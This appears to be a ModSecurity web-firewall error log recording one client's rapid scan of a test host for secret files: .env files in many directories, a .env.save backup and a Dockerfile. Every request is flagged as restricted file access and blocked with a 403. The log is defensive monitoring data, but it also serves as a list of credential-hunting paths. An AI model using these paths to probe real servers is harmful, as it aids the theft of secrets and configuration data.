[Mon Jan 12 15:43:13.587024 2026] [:error] [pid 1355926] [client 18.183.223.70:41592] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWUIgcC2y5bYy1r2HoPzeAAAAAM"]
[Mon Jan 12 15:43:14.315112 2026] [:error] [pid 1365295] [client 18.183.223.70:41752] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWUIgg7npFhQv7HWuOadzwAAAAo"]
[Mon Jan 12 15:43:14.315317 2026] [:error] [pid 1365295] [client 18.183.223.70:41752] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWUIgg7npFhQv7HWuOadzwAAAAo"]
[Mon Jan 12 15:43:14.315489 2026] [:error] [pid 1365295] [client 18.183.223.70:41752] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWUIgg7npFhQv7HWuOadzwAAAAo"]
[Mon Jan 12 15:43:15.031902 2026] [:error] [pid 1365300] [client 18.183.223.70:41912] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWUIg9lKlmIJBGbQbR78hAAAAAs"]
[Mon Jan 12 15:43:15.032112 2026] [:error] [pid 1365300] [client 18.183.223.70:41912] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWUIg9lKlmIJBGbQbR78hAAAAAs"]
[Mon Jan 12 15:43:15.032272 2026] [:error] [pid 1365300] [client 18.183.223.70:41912] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWUIg9lKlmIJBGbQbR78hAAAAAs"]
[Mon Jan 12 15:43:15.759413 2026] [:error] [pid 1362231] [client 18.183.223.70:42064] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWUIg8uCkgRo958sQERiRQAAAAc"]
[Mon Jan 12 15:43:15.759620 2026] [:error] [pid 1362231] [client 18.183.223.70:42064] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWUIg8uCkgRo958sQERiRQAAAAc"]
[Mon Jan 12 15:43:15.759785 2026] [:error] [pid 1362231] [client 18.183.223.70:42064] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWUIg8uCkgRo958sQERiRQAAAAc"]
[Mon Jan 12 15:43:16.480759 2026] [:error] [pid 1355923] [client 18.183.223.70:42222] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWUIhCE1xEBhFyXickXrsgAAAAA"]
[Mon Jan 12 15:43:16.480982 2026] [:error] [pid 1355923] [client 18.183.223.70:42222] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWUIhCE1xEBhFyXickXrsgAAAAA"]
[Mon Jan 12 15:43:16.481141 2026] [:error] [pid 1355923] [client 18.183.223.70:42222] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWUIhCE1xEBhFyXickXrsgAAAAA"]
[Mon Jan 12 15:43:17.206161 2026] [:error] [pid 1362233] [client 18.183.223.70:42374] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWUIhX2DuVtAKraH1YOOBgAAAAk"]
[Mon Jan 12 15:43:17.206396 2026] [:error] [pid 1362233] [client 18.183.223.70:42374] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWUIhX2DuVtAKraH1YOOBgAAAAk"]
[Mon Jan 12 15:43:17.206568 2026] [:error] [pid 1362233] [client 18.183.223.70:42374] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWUIhX2DuVtAKraH1YOOBgAAAAk"]
[Mon Jan 12 15:43:17.926567 2026] [:error] [pid 1356126] [client 18.183.223.70:42538] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWUIhTv8xyMiuvwfNnlkAAAAAAU"]
[Mon Jan 12 15:43:17.926776 2026] [:error] [pid 1356126] [client 18.183.223.70:42538] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWUIhTv8xyMiuvwfNnlkAAAAAAU"]
[Mon Jan 12 15:43:17.926944 2026] [:error] [pid 1356126] [client 18.183.223.70:42538] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWUIhTv8xyMiuvwfNnlkAAAAAAU"]
[Mon Jan 12 15:43:18.644268 2026] [:error] [pid 1358564] [client 18.183.223.70:42672] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWUIhh_UgGRJ4jDk47tQmAAAAAY"]
[Mon Jan 12 15:43:18.644478 2026] [:error] [pid 1358564] [client 18.183.223.70:42672] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWUIhh_UgGRJ4jDk47tQmAAAAAY"]
[Mon Jan 12 15:43:18.644638 2026] [:error] [pid 1358564] [client 18.183.223.70:42672] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWUIhh_UgGRJ4jDk47tQmAAAAAY"]
[Mon Jan 12 15:43:19.360515 2026] [:error] [pid 1355925] [client 18.183.223.70:42790] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWUIh07thAymmecRvtl0zwAAAAI"]
[Mon Jan 12 15:43:19.360741 2026] [:error] [pid 1355925] [client 18.183.223.70:42790] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWUIh07thAymmecRvtl0zwAAAAI"]
[Mon Jan 12 15:43:19.360909 2026] [:error] [pid 1355925] [client 18.183.223.70:42790] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWUIh07thAymmecRvtl0zwAAAAI"]
[Mon Jan 12 15:43:20.100052 2026] [:error] [pid 1355924] [client 18.183.223.70:42944] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWUIiNIpinFXoPzDav5wkgAAAAE"]
[Mon Jan 12 15:43:20.100266 2026] [:error] [pid 1355924] [client 18.183.223.70:42944] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWUIiNIpinFXoPzDav5wkgAAAAE"]
[Mon Jan 12 15:43:20.100419 2026] [:error] [pid 1355924] [client 18.183.223.70:42944] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWUIiNIpinFXoPzDav5wkgAAAAE"]
[Mon Jan 12 15:43:20.826864 2026] [:error] [pid 1355926] [client 18.183.223.70:43088] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWUIiMC2y5bYy1r2HoPzeQAAAAM"]
[Mon Jan 12 15:43:20.827118 2026] [:error] [pid 1355926] [client 18.183.223.70:43088] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWUIiMC2y5bYy1r2HoPzeQAAAAM"]
[Mon Jan 12 15:43:20.827286 2026] [:error] [pid 1355926] [client 18.183.223.70:43088] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWUIiMC2y5bYy1r2HoPzeQAAAAM"]
[Mon Jan 12 15:43:21.558655 2026] [:error] [pid 1365295] [client 18.183.223.70:43234] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWUIiQ7npFhQv7HWuOad0AAAAAo"]
[Mon Jan 12 15:43:21.558862 2026] [:error] [pid 1365295] [client 18.183.223.70:43234] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWUIiQ7npFhQv7HWuOad0AAAAAo"]
[Mon Jan 12 15:43:21.559026 2026] [:error] [pid 1365295] [client 18.183.223.70:43234] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWUIiQ7npFhQv7HWuOad0AAAAAo"]
[Mon Jan 12 15:43:22.293556 2026] [:error] [pid 1365300] [client 18.183.223.70:43382] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWUIitlKlmIJBGbQbR78hQAAAAs"]
[Mon Jan 12 15:43:22.293769 2026] [:error] [pid 1365300] [client 18.183.223.70:43382] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWUIitlKlmIJBGbQbR78hQAAAAs"]
[Mon Jan 12 15:43:22.293919 2026] [:error] [pid 1365300] [client 18.183.223.70:43382] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWUIitlKlmIJBGbQbR78hQAAAAs"]
[Mon Jan 12 15:43:23.010740 2026] [:error] [pid 1362231] [client 18.183.223.70:43540] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWUIi8uCkgRo958sQERiRgAAAAc"]
[Mon Jan 12 15:43:23.010965 2026] [:error] [pid 1362231] [client 18.183.223.70:43540] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWUIi8uCkgRo958sQERiRgAAAAc"]
[Mon Jan 12 15:43:23.011573 2026] [:error] [pid 1362231] [client 18.183.223.70:43540] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWUIi8uCkgRo958sQERiRgAAAAc"]
